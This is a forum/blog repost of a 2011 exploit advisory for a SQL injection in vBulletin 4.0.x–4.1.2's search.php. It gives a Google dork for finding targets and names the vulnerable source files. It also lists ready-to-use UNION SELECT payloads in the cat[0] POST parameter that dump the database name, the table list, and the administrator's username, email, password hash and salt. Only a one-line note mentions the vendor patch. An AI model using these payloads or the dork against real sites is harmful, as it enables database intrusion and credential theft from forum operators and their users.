BLOG OF H7T_2002

Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.
BLOG OF H7T_2002

Trang cá nhân của H7T_2002++


    vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

    h7t_2002
    avatar
    h7t_2002
    --[DEVELOPER]--
    --[DEVELOPER]--


    Tổng số bài gửi : 67
    Join date : 01/06/2009
    Age : 33
    Đến từ : /dev/null
    • Post n°1

    vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability Empty vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

    Bài gửi by h7t_2002 Wed Jun 08, 2011 2:36 pm

    Code:
    ================================================== ==================
    #vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
    ================================================== ==================
    # #
    # 888 d8 888 _ 888 ,d d8 #
    # e88~\888 d88 888-~\ 888 e~ ~ 888-~88e ,d888 _d88__ #
    # d888 888 d888 888 888d8b 888 888b 888 888 #
    # 8888 888 / 888 888 888Y88b 888 8888 888 888 #
    # Y888 888 /__888__ 888 888 Y88b 888 888P 888 888 #
    # "88_/888 888 888 888 Y88b 888-_88" 888 "88_/ #
    # #
    ================================================== ==================
    #PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
    ================================================== ==================

    #[+] Discovered By : D4rkB1t
    #[+] Site : NaN
    #[+] support e-mail : d4rkb1t@live.com


    Product: http://www.vbulletin.com
    Version: 4.0.x
    Dork : inurl:"search.php?search_type=1"

    --------------------------
    # ~Vulnerable Codes~ #
    --------------------------
    /vb/search/searchtools.php - line 715;
    /packages/vbforum/search/type/socialgroup.php - line 201:203;

    --------------------------
    # ~Exploit~ #
    --------------------------
    POST data on "Search Multiple Content Types" => "groups"

    &cat[0]=1) UNION SELECT database()#
    &cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
    &cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#

    More info: http://j0hnx3r.org/?p=818

    --------------------------
    # ~Advice~ #
    --------------------------
    Vendor already released a patch on vb#4.1.3.
    UPDATE NOW!

    ================================================== ==================
    # 1337day.com [2011-5-21]
    ================================================== ==================
    • Về Đầu Trang
      Hôm nay: Mon May 20, 2024 8:26 am